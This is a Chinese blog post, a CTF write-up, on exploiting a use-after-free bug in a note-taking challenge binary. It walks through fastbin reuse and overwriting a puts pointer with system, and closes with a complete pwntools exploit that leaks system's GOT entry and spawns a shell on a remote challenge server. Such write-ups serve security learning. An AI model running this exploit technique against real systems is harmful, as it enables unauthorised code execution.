<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="PWN," />










<meta name="description" content="0x00 前言sw师傅出的入群题 一道UAF技术的简单利用，漏洞原理可以参考如下几篇文章：">
<meta name="keywords" content="PWN">
<meta property="og:type" content="article">
<meta property="og:title" content="某群CTF">
<meta property="og:url" content="http://yoursite.com/2018/03/18/某群CTF/index.html">
<meta property="og:site_name" content="Mask&#39;s Blog">
<meta property="og:description" content="0x00 前言sw师傅出的入群题 一道UAF技术的简单利用，漏洞原理可以参考如下几篇文章：">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/0.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/1.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/4.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/3.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/2.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/5.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/6.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/7.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/8.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/9.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/10.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/11.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/12.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/13.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/14.png">
<meta property="og:image" content="http://yoursite.com/2018/03/18/某群CTF/15.png">
<meta property="og:updated_time" content="2018-04-13T12:39:23.738Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="某群CTF">
<meta name="twitter:description" content="0x00 前言sw师傅出的入群题 一道UAF技术的简单利用，漏洞原理可以参考如下几篇文章：">
<meta name="twitter:image" content="http://yoursite.com/2018/03/18/某群CTF/0.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/03/18/某群CTF/"/>





  <title>某群CTF | Mask's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mask's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/About/" rel="section">
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-嘤嘤嘤">
          <a href="/嘤嘤嘤嘤" rel="section">
            
            嘤嘤嘤
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/03/18/某群CTF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Mask">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mask's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">某群CTF</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-03-18T20:28:10+08:00">
                2018-03-18
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>sw师傅出的入群题</p>
<p>一道UAF技术的简单利用，漏洞原理可以参考如下几篇文章：</p>
<a id="more"></a>
<p><a href="http://d0m021ng.github.io/2017/03/04/PWN/Linux%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8BUse-after-free%E5%AE%9E%E4%BE%8B/" target="_blank" rel="noopener">http://d0m021ng.github.io/2017/03/04/PWN/Linux%E5%A0%86%E6%BC%8F%E6%B4%9E%E4%B9%8BUse-after-free%E5%AE%9E%E4%BE%8B/</a></p>
<p><a href="https://www.anquanke.com/post/id/85281" target="_blank" rel="noopener">https://www.anquanke.com/post/id/85281</a></p>
<p><a href="http://0x48.pw/2017/07/25/0x35/" target="_blank" rel="noopener">http://0x48.pw/2017/07/25/0x35/</a></p>
<p><a href="http://www.freebuf.com/articles/system/104144.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/system/104144.html</a></p>
<p><a href="http://www.freebuf.com/articles/security-management/105285.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/security-management/105285.html</a></p>
<h2 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h2><p>这种一般就是堆漏洞了</p>
<img src="/2018/03/18/某群CTF/0.png">
<p>删除函数这里free完之后没有置空</p>
<img src="/2018/03/18/某群CTF/1.png">
<p>再来分析一下添加函数：</p>
<img src="/2018/03/18/某群CTF/4.png">
<p>puts_0函数会返回调用puts函数</p>
<img src="/2018/03/18/某群CTF/3.png">
<p>gdb挂上开始调试吧，这里推荐下libheap插件，分析堆很方便</p>
<p>这里先申请一个大于16字节的size</p>
<img src="/2018/03/18/某群CTF/2.png">
<p>可以发现这里和之前静态分析的一样，申请了两个chunk</p>
<p>查看一下内容</p>
<img src="/2018/03/18/某群CTF/5.png">
<p>第一个chunk存放的是0x0804864以及0x09921018</p>
<p>可以发现0x0804864正好就是指向Puts函数，0x09921018则指向了第二个和之前静态分析吻合,</p>
<img src="/2018/03/18/某群CTF/6.png">
<p>那么利用点就在这个指向Puts函数的指针，将其改为system函数之后就能利用它getshell</p>
<p>接下来再创建一个24size的note</p>
<img src="/2018/03/18/某群CTF/7.png">
<p>然后释放第一个note,可以发现根据大小系统依次将两个堆块放到相对应的fastbin单链表中</p>
<img src="/2018/03/18/某群CTF/8.png">
<p>继续释放第二个note（emmm这里一下不小心操作失误去释放了了一下一个不存在的chunk，然后又重新操作了一边，地址又对不上了。。。，问题不大，能看懂就好）</p>
<img src="/2018/03/18/某群CTF/9.png">
<p>然后，这个时候再申请一个大小为16字节以内的note，得到的将是之前第一个note中第一个chunk的堆空间</p>
<img src="/2018/03/18/某群CTF/10.png">
<p>看一下内容：</p>
<img src="/2018/03/18/某群CTF/11.png">
<p>可以看到，那个指向Puts函数的指针以及被我们改掉了（这里为什么修改的是第一个chunk而不是第二个chunk呢？这就和你申请的大小有关，你后来申请了一个长度小于16size的note,那么自然会从第一条fastbins链中取，堆漏洞利用中，对于大小是很讲究的）</p>
<p>那么思路就是将那个指向Puts函数的指针改为system函数，这样print note时就能调用system函数</p>
<img src="/2018/03/18/某群CTF/12.png">
<p>但是现在并不知道system函数的地址，libc版本也没给，之前sw师傅在群里也说了不用leak，那么就猜应该有system的.got地址，搜一下，还真的有</p>
<img src="/2018/03/18/某群CTF/13.png">
<p>那么就可以先利用Puts函数打印出system函数，然后再将system函数地址覆盖Puts函数指针，然后再print note一下就能调用system函数从而getshell了</p>
<p>还有一个小问题，就是当从print_note去调用system函数时，参数里会包括system函数本身</p>
<img src="/2018/03/18/某群CTF/14.png">
<p>也就是会出现这种情况：</p>
<p><code>system(system_addr+参数)</code></p>
<p>那么这里有个小技巧（网上查的）</p>
<p><code>system(system+&#39;;/sh&#39;)</code></p>
<p>这样就行了</p>
<h2 id="0x02-exp编写"><a href="#0x02-exp编写" class="headerlink" title="0x02 exp编写"></a>0x02 exp编写</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">import sys</span><br><span class="line">context.log_level = &quot;debug&quot;</span><br><span class="line">puts_addr = 0x0804864b</span><br><span class="line">def Send(data):</span><br><span class="line"></span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(str(data))</span><br><span class="line"></span><br><span class="line">def Add(size,content):</span><br><span class="line"></span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(&quot;1&quot;)</span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(str(size))</span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(content)</span><br><span class="line"></span><br><span class="line">def Free(Index):</span><br><span class="line"></span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(&quot;2&quot;)</span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(str(Index))</span><br><span class="line"></span><br><span class="line">def Show(Index):</span><br><span class="line"></span><br><span class="line">p.recvuntil(&quot;:&quot;)</span><br><span class="line">p.sendline(&quot;3&quot;)</span><br><span class="line">p.recvuntil(&quot;Index :&quot;)</span><br><span class="line"></span><br><span class="line">if name == &quot;main&quot;:</span><br><span class="line"></span><br><span class="line"># p = process(&apos;./backdoor&apos;)</span><br><span class="line"></span><br><span class="line">    p = remote(&apos;p007.cc&apos;,7777)</span><br><span class="line"></span><br><span class="line">    elf = ELF(&apos;./backdoor&apos;)</span><br><span class="line"></span><br><span class="line">    system_got = elf.got[&apos;system&apos;]</span><br><span class="line"></span><br><span class="line">    Add(24,&quot;1&quot;*23)</span><br><span class="line">    Add(24,&quot;2&quot;*23)</span><br><span class="line">    Free(0)</span><br><span class="line">    Free(1)</span><br><span class="line">    payload = p32(puts_addr) + p32(system_got)</span><br><span class="line">    Add(8,payload)</span><br><span class="line">    Show(0)</span><br><span class="line">    system_addr = u32(p.recv(4))</span><br><span class="line"></span><br><span class="line">    log.success(&apos;system_addr: &apos;+ hex(system_addr))</span><br><span class="line">    Free(2)</span><br><span class="line">    payload = p32(system_addr)+&apos;;sh&apos;</span><br><span class="line">    Add(8,payload)</span><br><span class="line">    Show(0);</span><br><span class="line">    p.interactive()</span><br></pre></td></tr></table></figure>
<p>运行之后getshell</p>
<img src="/2018/03/18/某群CTF/15.png">

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/PWN/" rel="tag"># PWN</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/03/18/Ali早期壳分析/" rel="next" title="Ali早期壳分析">
                <i class="fa fa-chevron-left"></i> Ali早期壳分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/03/19/简单的ELF解析器/" rel="prev" title="简单的ELF解析器">
                简单的ELF解析器 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="Mask" />
            
              <p class="site-author-name" itemprop="name">Mask</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-前言"><span class="nav-number">1.</span> <span class="nav-text">0x00 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-漏洞分析"><span class="nav-number">2.</span> <span class="nav-text">0x01 漏洞分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-exp编写"><span class="nav-number">3.</span> <span class="nav-text">0x02 exp编写</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Mask</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
